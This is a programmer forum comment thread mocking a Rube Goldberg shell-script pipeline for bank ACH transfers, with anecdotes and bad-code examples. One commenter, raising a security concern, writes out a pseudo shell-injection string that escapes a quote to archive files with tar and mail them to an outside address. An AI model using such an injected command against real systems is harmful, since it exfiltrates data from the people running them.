• Derek (unregistered)

    Oh. Dear. God.

  • (cs)

    I almost had a heart attack while reading that... O_O

  • Shakes (unregistered) in reply to Derek

    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt

  • Colin (unregistered)

    Now if I can find a bank that bounces money around in a similar fashion then I can stop laundering money.

  • awefawfeawfe (unregistered) in reply to Colin

    Bleh.  I've seen this lots with so-called Unix pros.  They just can't let go of Unix, and have to wedge shit like scripts into everything, even if they're not required.

  • (cs) in reply to Shakes
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt


    I doubt it; a Perl programmer would know how to format text without all the hurdles.  Sounds like a bunch of shell scripts.

    I just can't fathom how someone can understand awk, sed, and stuff, and not understand basic programming concepts.  Someone please shoot the developer and put him out of our misery.
  • BlackTigerX (unregistered)

    very Unixy indeed

  • (cs)

    I can't think of anything more powerful than copy-pasting a batch file into a Hyperterminal connection...

    If only I had thought of that before I spent so much time writing a semi-DTS middleware-driven service to replicate data between my clients...


  • (cs)

    Two possibilities:

    1. Accretion: Day 1: "It has to do this." Day 3: "It has to do this, too." Day 8: "Can you add this?" ...

    2. Fear: "I know what I know, and can't/won't learn one iota more, even though that would save gobs of time and produce a safer & more maintainable product. (No one will ever need to update it, right?) And I'll make it work somehow."

  • Otto (unregistered)

    You can't shock me with stuff like that. I've got a set of scripts right here which uses grep, sed, awk, bash, ksh, perl, sql, and even ftp. It's like 3000 lines total and about 15 files, and the upshot of it is to build about 4000 files (based on info from the database) which then get ftp'd to 4000 different machines. It's fairly robust and works reasonably well, and the fact that I could totally rewrite it in one C program and about 400 lines of code is sorta beside the point, I feel. Some things you just have to admire for the sheer insanity of them. There's some quite elegant pieces of scripting action in this thing, for example, even if the whole of it is a WTF.

    Forum WTF: I can't seem to log in.

  • Scott (unregistered) in reply to BlackTigerX

    Well,

    I'm a recent Computer Science grad, and they taught us Bash, Awk, Sed and Grep before they taught us OO. And A LOT of people dropped out in that semester. You would still have enough knowledge to pass yourself off as intelligent to a non-tech person.

    Oh, and that collection of scripts sounds terrifying.

  • (cs)

    I can sum up the story:  Developer mistakes bad design for fundamental tenet of philosophy X.  In this case, X = Unix.

    This WTF is just bad design, which we can all agree is platform agnostic.

  • Dave (unregistered) in reply to Otto

    The Real WTF is saying "I can't seem to log in..." when you just posted a message.

  • (cs) in reply to Chris F

    I'd need more history on this development to know where the blame lies.

    I could easily enough imagine a developer having the fear of God put into him over the serious nature of banking transactions and the importance of complete audit trails, so he wants to visually verify the results at each step of the operation, to audit and ensure correctness and completeness at every stage.  Rewriting each function once you've verified it kinda undermines the purpose of verification.  As (in general terms) does changing the execution path in any way to choose between verification and execution.

    The script could have dialled in to the bank and transferred the file automatically, but would you trust it to do so if you were the CFO?  What errors might go unnoticed?  And mailing it to oneself does have the side benefit of capturing a copy of the file in a separate system for any backup purposes, should anything go wrong with the transaction.

    Sure, it's a WTF.  But so are most systems that we rely on every day.

  • RJ (unregistered) in reply to Chris F

    Being the "RJ" in question above (and a longtime FreeBSD and Linux user), I had no intention of making fun of the Unix philosophy; rather "how much work some will do to imagine they are working in the Unix tradition".

    But yes, the WTF was just bad design, combined with Unix newbie arrogance. As I recall, the guy who did the script actually spent 2 months preparing, reading up on the "theory" of EDI, etc...

    In fact, the above was only one example of design WTF that I found on arriving at that company. Among others:

    1. Test data commingled with production data in a single MySQL database (never mind that using MySQL for banking data is questionable in itself). In fact, I finally gave up on ever identifying which was which, and made a clean break with a new system in the end.

    2. Apparently the 4 previous developers had never heard of a JOIN in SQL. They would handle all join-type operations by looping through records in PHP and then issuing sub-queries for every row of the main result set. Occasionally the nesting would be 3 or 4 levels deep. This came to my attention when I realized that a 1000-member list of customers + status was taking 10 minutes to appear in the browser.

    3. Identically-named functions copied and pasted into different contexts, and subtly altered for that context.

    4. <b>Reverse</b> indentation. Yes, that's right... you would see a function name about 3 tabs in, and then the body of code stuck right on the margin.

    5. Phantom "else" clauses:

    if($check = 1){
        ...do something
    }
    else{
        ;
    }

    6. Code in about half of the PHP files had about 5 or 6 (or 7) spaces between lines. I guess someone wanted to inflate their LOC.

    7. umm... forget it. I'm too disgusted to even finish this list. Let's just say that by the end I had almost completely redesigned their system, as well as migrated to PostgreSQL, leaving the design standard enough to migrate to Oracle if needed.
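(The join-vs-loop problem in point 2 above can be demonstrated in miniature with sqlite3. The tables, columns, and data here are invented for illustration; they are not from the original system.)

```shell
#!/bin/sh
# Invented tables standing in for the customer/status data from point 2.
db=/tmp/join_demo.db
rm -f "$db"
sqlite3 "$db" <<'SQL'
CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE status (customer_id INTEGER, state TEXT);
INSERT INTO customers VALUES (1, 'Alice'), (2, 'Bob');
INSERT INTO status VALUES (1, 'active'), (2, 'closed');
SQL

# The "N+1" pattern the PHP loops amounted to: one sub-query per row
# of the main result set.
sqlite3 "$db" 'SELECT id FROM customers;' | while read -r id; do
    sqlite3 "$db" "SELECT state FROM status WHERE customer_id = $id;"
done

# One JOIN: a single round trip, and the database does the matching.
sqlite3 "$db" 'SELECT c.name, s.state FROM customers c
               JOIN status s ON s.customer_id = c.id;'
```

With 1000 rows, the loop version issues 1001 separate queries plus per-query PHP round-trip overhead, which is exactly how a simple customer list ends up taking 10 minutes.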

  • (cs)

    That's worse than most configure scripts.

    # Is the header present?
    echo "$as_me:$LINENO: checking nl.h presence" >&5
    echo $ECHO_N "checking nl.h presence... $ECHO_C" >&6
    cat >conftest.$ac_ext <<_ACEOF
    /* confdefs.h.  */
    _ACEOF
    cat confdefs.h >>conftest.$ac_ext
    cat >>conftest.$ac_ext <<_ACEOF
    /* end confdefs.h.  */
    #include <nl.h>
    _ACEOF
    if { (eval echo "$as_me:$LINENO: \"$ac_cpp conftest.$ac_ext\"") >&5
      (eval $ac_cpp conftest.$ac_ext) 2>conftest.er1
      ac_status=$?
      grep -v '^ *+' conftest.er1 >conftest.err
      rm -f conftest.er1
      cat conftest.err >&5
      echo "$as_me:$LINENO: \$? = $ac_status" >&5
      (exit $ac_status); } >/dev/null; then
      if test -s conftest.err; then
        ac_cpp_err=$ac_c_preproc_warn_flag
        ac_cpp_err=$ac_cpp_err$ac_c_werror_flag
      else
        ac_cpp_err=
      fi
    else
      ac_cpp_err=yes
    fi

    At least this has an excuse: it's automatically generated.

  • (cs)
    Jake Vinson:

    After a few questions, I began to piece together how this thing actually worked: once a day the manager (a non-technical employee) would log into the main Linux server *as root*, cd to a directory inside /usr, run a certain shell script, and pipe the output to the Unix 'mail' utility to email it to his own desktop. From there, he would copy the text into Wordpad, make sure all formatting was correct, and then run that classic Windows dial-up console, Hyperterminal. He would dial the bank system, log in, and finally paste the ACH text from Wordpad into Hyperterminal to finalize the transactions.

    <FONT face=Georgia>I know the multiple scripting sounds terrible, but what about allowing the day manager, a non-techie, to log in as root? Wouldn't the manager have power to "inflate" his own account, and manipulate other sensitive data? WTF indeed.</FONT>

    >BiggBru

  • (cs)
    Jake Vinson:

    On thinking it through, this whole thing could be done with a 10 line script running 3 SQL queries. But that wouldn't be very Unix-ish, would it? Did I mention that the person who did this took weeks...?


    Don't forget to add enough Enterprise to it!
  • (cs) in reply to Coughptcha

    The next thing I'd do would be to find out whether any UNIX scripts are processing user input. I'm neither a security nor a UNIX expert (so excuse my pseudo-UNIX), but I'd suspect that user input like:
    "'; tar * > insecure.tar; mail (options) insecure.tar [email protected]; (note the double quote to escape string delimitation)
    would make it to the shell via user input and as a bonus probably SQL injection code too if his input validation processes look anything like his SQL.

  • ParkinT (unregistered)

      Scripts that call other scripts ad infinitum...WHOA!!

  • ParkinT (unregistered) in reply to marvin_rabbit
    marvin_rabbit:
    Jake Vinson:

    On thinking it through, this whole thing could be done with a 10 line script running 3 SQL queries. But that wouldn't be very Unix-ish, would it? Did I mention that the person who did this took weeks...?


    Don't forget to add enough Enterprise to it!

    And pipe the output into XML !

  • He Sed Awk (unregistered) in reply to notromda

    I can ... worked for the guy.

    We had a document production system - long story, but the print queue management was done via a shell script (the print queues were directories in a Linux file system - do not ask).

    Well, there were times where file collisions would cause pages to be missing from the document package built from this queue.  The shell script did no error handling and just allowed files to get clobbered.  This annoyed our customers to no end - they had to call in and complain, then the pages would be reproduced - you get the idea. 

    I checked into this, found the script and decided that this needed to be fixed.  An hour and a couple dozen lines of nice Perl code and the thing was running like a clock - never again missing pages.

    Manager was told and went nuts - claimed that Perl would be loaded dozens of times, bog down the system, was the wrong ... blah blah.  Even after ps logs showing things running smoothly and weeks of flawless production (we used to get at least one a day), he still was not convinced. 

    He wanted it written in sed and awk.  I said that was entirely wrong.  Eventually he tossed the O'Reilly book "sed & awk" on my desk and told me that he had no use for a developer who was not willing to learn.  I still have that book, he was fired as the tech manager, and all of the quality developers, myself included, no longer work there.

     

  • Valdas (unregistered)

    Yeah, this sounds quite f**ked up... However, there ARE cases where you don't want the SQL engine to do almost anything. I do remember one project that basically replaced a complex SQL query that was pulling ~80 MB of data from a data warehouse with a simple SQL dump, syncsort, and a bunch of Perl scripts to parse through the data. The end result was that an 8-hr process came down to 1-2 hrs.

  • Michael Langford (unregistered)

    Sounds like he just needed to use minicom; then it would have worked without human intervention... I'm really going to have to disagree. This isn't a WTF. This is merely a process the company finally decided to do right, having only shakily automated it before.

    Seriously, that would have been a great way to do some housekeeping functions of the business, but it's an unforgivably poor decision to leave it as unmaintainable scripting when it was so important to the core business functions.

    Oh wait, they DID assign someone to redo this in a more maintainable style. I mean, perhaps the time that the system was used was overlong; however, this isn't a horrible process.

    Except for the mailing to the dude to paste into Hyperterminal, this is a fine way to do less important things. Comparing this method to manually doing it all, it's a great method.

    The point of business isn't to do things elegantly, it's to do them cheaply*. This method did it in spades. It could have used a little more documentation, from what I can tell, but it sounds perfectly reasonable other than that for a v1 system. What he's calling Rube Goldberg is incredibly fast to develop, and just works well enough for basic systems.

                  --Michael


    *In the long run, Elegant=Cheap. Then again, apparently someone at this company (the person who assigned the submitter the task) understood this fact, and had him redo it.

  • (cs) in reply to jspenguin
    jspenguin:
    That's worse than most configure scripts.

    Oh yeah, GNU Autotools, our fun unholy union of Perl, bash, m4, Make, and the muck from the depths of RMS's depraved mind. The biggest threat when trying to extend any GNU program is accidentally opening "Makefile.in" when you meant to open "Makefile.am". =)

    (Sigh... we have SCons, Rake, and dozens of other things that are a bit easier to figure out. Heck, even Ant is more straightforward with its XML build files...)

  • password (unregistered)

    I bet the root password was something like 'cookies' too, right?

  • (cs) in reply to BlackTigerX
    Anonymous:
    very Unixy indeed


    Not at all, actually. What RJ did in the end, a 10-line script with 3 SQL queries, that was Unixy. See http://www.faqs.org/docs/artu/ (I love being able to insert links, at last. Oh and the new edit control is far more responsive than the old one).

  • anonymous (unregistered) in reply to RJ

    Anonymous:
    Being the "RJ" in question above (and a longtime FreeBSD and Linux user), I had no intention of making fun of the Unix philosophy; rather "how much work some will do to imagine they are working in the Unix tradition:".

     

    Yes, but you realize, this is the site where the stupid come to mock the ignorant (except on Wednesdays, when the ignorant mock the stupid), so you had to know the post would be misinterpreted as an attack on Unix.

  • He Sed Awk (unregistered) in reply to He Sed Awk

    Oops I meant to quote :

    ... I just can't fathom how someone can understand awk, sed, and stuff, and not understand basic programming concepts.  Someone please shoot the developer and put him out of our misery ...


  • (cs) in reply to Michael Langford
    Anonymous:
    What he's calling Rube Goldberg is incredibly fast to develop, and just works well enough for basic systems.


    I think you are forgetting this sentence: "Apparently, this script had taken weeks to produce, and was the most revered "mission critical" piece of the system."

    *In the long run, Elegant=Cheap. Then again, apparently someone at this company (the person who assigned the submitter the task) understood this fact, and had him redo it.


    Exactly.  Have a look at <http://www.martinfowler.com/bliki/TechnicalDebt.html>.

    Sincerely,

    Gene Wirchenko

  • Kypeli (unregistered)

    I have this friend who says Unix-like systems are so great because they have small, well defined programs that do their job very efficiently and then you just use these programs together to accomplish what you want to do.

    I wonder if this is the perfect example to show how it should be done in the wonderful Unix way?

  • (cs) in reply to felix
    felix:
    Anonymous:
    very Unixy indeed


    Not at all, actually. What RJ did in the end, a 10-line script with 3 SQL queries, that was Unixy. See http://www.faqs.org/docs/artu/ (I love being able to insert links, at last. Oh and the new edit control is far more responsive than the old one).



    But where's the pizza?  Also, the edit box is still tetchy about moving the cursor to the last line when you click somewhere below the last line (Firefox 1.5.0.3)

  • eddiedatabaseboston (unregistered) in reply to RJ
    Anonymous:

    5. Phantom "else" clauses:

    if($check = 1){
        ...do something
    }
    else{
        ;
    }



    This could have been done for debugging, to allow a place to add a breakpoint.
  • Who Wants To Know? (unregistered)

    Hey, let us know WHICH company does this!  They are BREAKING US law DIRECTLY, and at least a lot of countries' laws on fiduciary duty!  There should be NO need for checks, it should NOT be clear text, etc....

    As for how the guy did it before you?  ACH format is pretty well known NOW, but what about when it was written?  What limitations were put on him?  I, as MOST techies can say also, am VERY well aware of how a simple project that SHOULD take an hour can be drawn out into one taking MONTHS!  Not because of the system.  Perhaps not even because of the employees!   The corporate structure may greatly complicate things.  Were sysadmins, dbas, configuration management, etc... involved?  Was the UNIX system CRIPPLED in some way?  Did their manager WANT to review the stuff (AGAIN, that is ILLEGAL)?

    UNIX was written in the late sixties.  The I.E.E.E. made a STANDARD of it in the 70s.  In the 80s, the entire computer industry was spun around when IBM did the UNTHINKABLE and said they were NOT THE source.  When all those companies wanted to sell to a now platform weary public, which O/S did they choose?  AIX?  SOLARIS?  HP/UX?  ULTRIX?  NPS?  MPRAS?  All of the above are made by different big companies that were around in the 80s.  ALL are variants of UNIX! 

    I guess there is SOMETHING to it!

    BTW have you dealt with outlook/xchange/activex/vb/access/odbc/etc.... yet?  Just the macros in ACCESS could drive you NUTS!  Let's not place ALL the blame on UNIX!

    Steve

  • (cs)

    Wow, and you wanted to change it?!?!?!!? WHY!?!?!?!?
    It's UNIX! You HAVE to use shell scripts, and stream processing utils in ANY unix program! It's UNIX for crying out loud! What would a script be without using sed, cat, awk, and grep? I think it's complete genious, no wait, make that Brillance!

  • Chris (unregistered)

    I hope you're proud, Daily WTF people! Every time I read one of these I gain a new layer of fear to do anything on the net. Ahh, my ignorance was such sweet bliss...

  • Knobcheese (unregistered) in reply to Who Wants To Know?
    Anonymous:
    BTW have you dealt with outlook/xchange/activex/vb/access/odbc/etc.... yet?  Just the macros in ACCESS could drive you NUTS!  Let's not place ALL the blame on UNIX!


    I think YOUR caps lock KEY is BROKEN!
  • JoeBloggs (unregistered) in reply to Shakes
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt

    Can't be. If it was Perl, the submitter would be complaining about having to maintain 80 bytes of line noise.

  • (cs) in reply to JoeBloggs
    Anonymous:
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt
    Can't be. If it was Perl, the submitter would be complaining about having to maintain 80 bytes of line noise.
    And furthermore Perl has this handy thing called "DBI" to handle this advanced "database usage" thing, though that doesn't prevent people from open()ing a pipe to their sql command line client... *sigh*
  • (cs)

    The real WTF is that they didn't simply use a CRON job.

  • (cs) in reply to Bus Raker

    Bus Raker:
    The real WTF is that they didn't simply use a CRON job.

    I'm a little fuzzy on my corporate IT evolution...

    Punchcards > Unix Shell Scripts > Windows Batch Files > Unix Shell Scripts (Windows found to be not secure) > Windows VBS/Batch (thought to be secure) > Linux/Database  (Windows thought not to be secure) > Windows/XML Database (again thought to be secure) > ???

    Sounds like these scripts had evolved over the entire OS timeline.

  • (cs) in reply to Bus Raker
    Bus Raker:

    Bus Raker:
    The real WTF is that they didn't simply use a CRON job.

    I'm a little fuzzy on my corporate IT evolution...

    Punchcards > Unix Shell Scripts > Windows Batch Files > Unix Shell Scripts (Windows found to be not secure) > Windows VBS/Batch (thought to be secure) > Linux/Database  (Windows thought not to be secure) > Windows/XML Database (again thought to be secure) > ???

    Sounds like these scripts had evolved over the entire OS timeline.



    In Oracle, there is a mechanism similar to cron jobs, called DBMS_JOB. Since stored procedures written in PL/SQL can write files, open network connections, etc., probably the whole thingy could be made as a single stored procedure. Though this might get it to the TDWTF front page, too.
  • GrandmasterB (unregistered) in reply to Shakes

    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt

    Nah.  If it was Perl, the guy would have stuffed the entire thing into a single regex.

  • gordy (unregistered) in reply to Valdas

    I hope you meant to say ~80GB

  • Phill Kenoyer (unregistered)

    Finish off your 10 line script with expect to send the output to the bank, then setup cron to run it auto-magically. No more need for anyone to manually run it.
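(The cron half of that suggestion would look something like the entry below. The script path, schedule, and address are invented; the idea is just that an expect(1) wrapper drives the bank's dial-up session instead of a human pasting into Hyperterminal.)

```shell
# Hypothetical crontab entry: run the ACH job nightly at 23:30, and mail
# an operator if the expect-driven upload script exits nonzero.
30 23 * * * /usr/local/bin/ach_upload.exp || echo "ACH upload failed" | mail -s "ACH failure" ops@example.com
```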

  • (cs) in reply to Shakes
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt


    I actually just got finished writing a big general ledger job in Perl, and I assure you that mine was a nice clean program without ever referencing any Unix shell scripts; when it got done running, the transaction was safely in the bank, and the confirmation was filed in the database and emailed to the people who cared.

    This sounds like the work of a bash junkie who doesn't understand coding. Perl is way too good at this sort of data manipulation to have ever needed as many extra steps as are described.
  • (cs)

    Sounds like this guy and the guy from  "Web 0.1"  posted last week need to get together.  They could have helped each other.  I think it would have worked better if the non-technical employee had to print out the ACH text from Wordpad, place it on his desk, take a photo of it, scan the photo, then send it to the bank to finalize the transactions. Why not!!!

  • RJ (unregistered) in reply to Satanicpuppy

    No, Perl was not involved in that mess. It was just a collection of Bash scripts. And for an example of the scripting proficiency involved, (AFAIR) the author used the following sort of construct to figure out how far to pad the numbers:

    if AMOUNT >= 10
        then PADCHARS = 8
    else
    if AMOUNT >= 100
        then PADCHARS = 7
    else
    #etc... proceeding up to 1000000
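(For contrast, a single printf does the whole padding job. The 10-digit field width below is an assumption for illustration, not the actual ACH field spec.)

```shell
# One printf replaces the entire if/else ladder: zero-pad AMOUNT to a
# fixed width. %010d means "decimal, left-padded with zeros to 10 chars".
AMOUNT=4217
printf '%010d\n' "$AMOUNT"   # -> 0000004217
```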

  • kipthegreat (unregistered) in reply to BiggBru
    BiggBru:
    Jake Vinson:

    After a few questions, I began to piece together how this thing actually worked: once a day the manager (a non-technical employee) would log into the main Linux server *as root*, cd to a directory inside /usr, run a certain shell script, and pipe the output to the Unix 'mail' utility to email it to his own desktop. From there, he would copy the text into Wordpad, make sure all formatting was correct, and then run that classic Windows dial-up console, Hyperterminal. He would dial the bank system, log in, and finally paste the ACH text from Wordpad into Hyperterminal to finalize the transactions.

    <font face="Georgia">I know the multiple scripting sounds terrible, but what about allowing the day manager, a non-techie, to log in as root? Wouldn't the manager have power to "inflate" his own account, and manipulate other sensitive data? WTF indeed.</font>

    >BiggBru



    Nope, only a techie would know how to correctly modify the numbers.  That's why my company hires illiterate homeless people to run lists of credit card numbers from the office to the bank downtown.  Anyone else would be tempted to misuse the data.
  • Tim (unregistered)

    While this doesn't sound like it is the case here, there is a reason you might have this many steps in a batch process.

    Think pipelining and checkpointing.  If any step fails, you don't have to start at the beginning.  It is also possible that some steps can be run in N parallel processes.

    It is much harder to scale an SQL query that takes an hour to process on a single machine than it is to scale a chain of scripts, even if the scripts take 2 hours to run on the same machine.
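(The checkpointing idea above can be sketched in a few lines of shell. Step names, paths, and the toy commands are invented; the pattern is just "each stage writes a file, and a stage is skipped on re-run if its output already exists".)

```shell
#!/bin/sh
# Checkpointed pipeline sketch: a failure in a late step doesn't force
# redoing the earlier, already-completed steps on the next run.
set -e
work=/tmp/pipeline_demo
rm -rf "$work"
mkdir -p "$work"

run_step() {               # run_step <name> <command...>
    out="$work/$1.out"
    shift
    if [ -f "$out" ]; then
        echo "skip: $out already exists"
    else
        "$@" > "$out"
    fi
}

run_step extract   echo "raw data"
run_step transform sed 's/raw/clean/' "$work/extract.out"
run_step load      cat "$work/transform.out"
```

If the `load` step fails, rerunning the script skips `extract` and `transform` and retries only the failed stage, which is the checkpointing benefit Tim describes.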

Leave a comment on “More Rube Goldberg design”
